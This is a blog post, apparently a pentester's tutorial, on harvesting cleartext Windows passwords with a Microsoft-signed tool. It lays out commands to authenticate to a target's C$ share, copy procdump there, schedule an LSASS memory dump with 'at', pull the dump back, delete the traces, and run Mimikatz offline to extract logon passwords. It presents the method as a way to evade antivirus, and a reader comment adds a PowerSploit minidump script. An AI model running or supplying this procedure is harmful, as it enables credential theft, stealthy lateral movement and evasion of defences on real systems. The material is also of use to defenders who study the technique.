Using Mimikatz Alpha or Getting Clear Text Passwords with a Microsoft Tool

简介: Mimikatz is now built into Metasploit's meterpreter, you can do load mimikatz from the meterpr...

Mimikatz is now built into Metasploit's meterpreter, you can do load mimikatz from the meterpreter prompt, but if you don't want to go through the hassle of dealing with AV, reverse or bind payloads, meterpreter binaries, and you have clear text credentials for an admin, you can just use Mimikatz's alpha release that allows you to run Mimikatz on your machine against a process memory dump of LSASS. The great thing about this technique is that the only thing on disk is a Microsoft tool.

Mimikatz Minidump: http://blog.gentilkiwi.com/securite/mimikatz/minidump

Procdump: http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx

Lets start. First we make sure our authentication works against the box and we can look inside of C$ (usually only admins can)

net use \\TARGETBOX\C$ /user:DOMAIN\serviceaccount serviceaccount123
dir \\TARGETBOX\C$

If that works then we want to check that we can all the "AT" command on the remote host:

at \\TARGETBOX

All set. Next lets prep our workspace on the remote host. We are using the C:\Temp directory.

mkdir \\TARGETBOX\C$\Temp
dir \\TARGETBOX\C$\Temp
copy c:\temp\procdump.exe \\TARGETBOX\C$\
copy c:\temp\procdump.bat \\TARGETBOX\C$\

The contents of procdump.bat are:

@echo off
C:\temp\procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp

I'm using the computer name in the memory dump name to help me keep track of where the dump came from, but also help me notice when I've dumped more than one IP that is actually the same host.

Next we schedule the task. Use net time to determine the local time for the remote machine.

net time \\TARGETBOX
at \\TARGETBOX 13:52 C:\Temp\procdump.bat

Pull down the file and clean up:

dir \\TARGETBOX\C$\Temp
copy \\TARGETBOX\C$\Temp\*lsass.dmp C:\temp\output\
rmdir /s \\TARGETBOX\C$\Temp

On your side the only thing you need to make sure is that you are running Mimikatz on a similar version and architecture you pulled from. Use the following url for reference:http://blog.gentilkiwi.com/wp-content/uploads/2013/04/minidump_matrix.png

Load up the Alpha version of Mimikatz, switch it to minidump mode and you're dumping creds:

mimikatz # sekurlsa::minidump SUPERCOMPUTER_lsass.dmp
Switch to MINIDUMP

mimikatz # sekurlsa::logonPasswords full

 

Thats it. Password dumping without ever using a "Hacker" tool on target. Much love Microsoft. And even more to Mimikatz creator @gentilkiwi - Benjamin Delpy for both this alpha release and changing his licensing to allow Mimikatz code to be integrated into Meterpreter.

Reader Comments (1)

you can even create minidump via PowerShell script =)

https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1

funny that the example given is LSASS process ;)


目录
相关文章
|
3天前
|
人工智能 运维 安全
|
1天前
|
人工智能 异构计算
敬请锁定《C位面对面》,洞察通用计算如何在AI时代持续赋能企业创新,助力业务发展!
敬请锁定《C位面对面》,洞察通用计算如何在AI时代持续赋能企业创新,助力业务发展!
|
8天前
|
人工智能 JavaScript 测试技术
Qwen3-Coder入门教程|10分钟搞定安装配置
Qwen3-Coder 挑战赛简介:无论你是编程小白还是办公达人,都能通过本教程快速上手 Qwen-Code CLI,利用 AI 轻松实现代码编写、文档处理等任务。内容涵盖 API 配置、CLI 安装及多种实用案例,助你提升效率,体验智能编码的乐趣。
765 109
|
2天前
|
机器学习/深度学习 传感器 算法
Edge Impulse:面向微型机器学习的MLOps平台——论文解读
Edge Impulse 是一个面向微型机器学习(TinyML)的云端MLOps平台,致力于解决嵌入式与边缘设备上机器学习开发的碎片化与异构性难题。它提供端到端工具链,涵盖数据采集、信号处理、模型训练、优化压缩及部署全流程,支持资源受限设备的高效AI实现。平台集成AutoML、量化压缩与跨硬件编译技术,显著提升开发效率与模型性能,广泛应用于物联网、可穿戴设备与边缘智能场景。
171 127
|
3天前
|
算法 Python
【轴承故障诊断】一种用于轴承故障诊断的稀疏贝叶斯学习(SBL),两种群稀疏学习算法来提取故障脉冲,第一种仅利用故障脉冲的群稀疏性,第二种则利用故障脉冲的额外周期性行为(Matlab代码实现)
【轴承故障诊断】一种用于轴承故障诊断的稀疏贝叶斯学习(SBL),两种群稀疏学习算法来提取故障脉冲,第一种仅利用故障脉冲的群稀疏性,第二种则利用故障脉冲的额外周期性行为(Matlab代码实现)
230 152
|
5天前
|
Java 数据库 数据安全/隐私保护
Spring 微服务和多租户:处理多个客户端
本文介绍了如何在 Spring Boot 微服务架构中实现多租户。多租户允许单个应用实例为多个客户提供独立服务,尤其适用于 SaaS 应用。文章探讨了多租户的类型、优势与挑战,并详细说明了如何通过 Spring Boot 的灵活配置实现租户隔离、动态租户管理及数据源路由,同时确保数据安全与系统可扩展性。结合微服务的优势,开发者可以构建高效、可维护的多租户系统。
210 127
|
4天前
|
机器学习/深度学习 存储 资源调度
CMSIS-NN:ARM Cortex-M处理器的高效神经网络内核——论文解读
CMSIS-NN是专为ARM Cortex-M系列微控制器优化的神经网络计算内核库,旨在支持资源受限的物联网边缘设备进行高效的深度学习推理。该库通过对卷积、池化、全连接层等关键操作进行定点量化、SIMD指令优化和内存布局调整,显著提升了模型在嵌入式设备上的运行效率。实验表明,CMSIS-NN在Cortex-M7处理器上的推理速度比基准实现提升了近5倍,大幅降低了功耗,为边缘AI应用提供了可行的技术路径。
224 128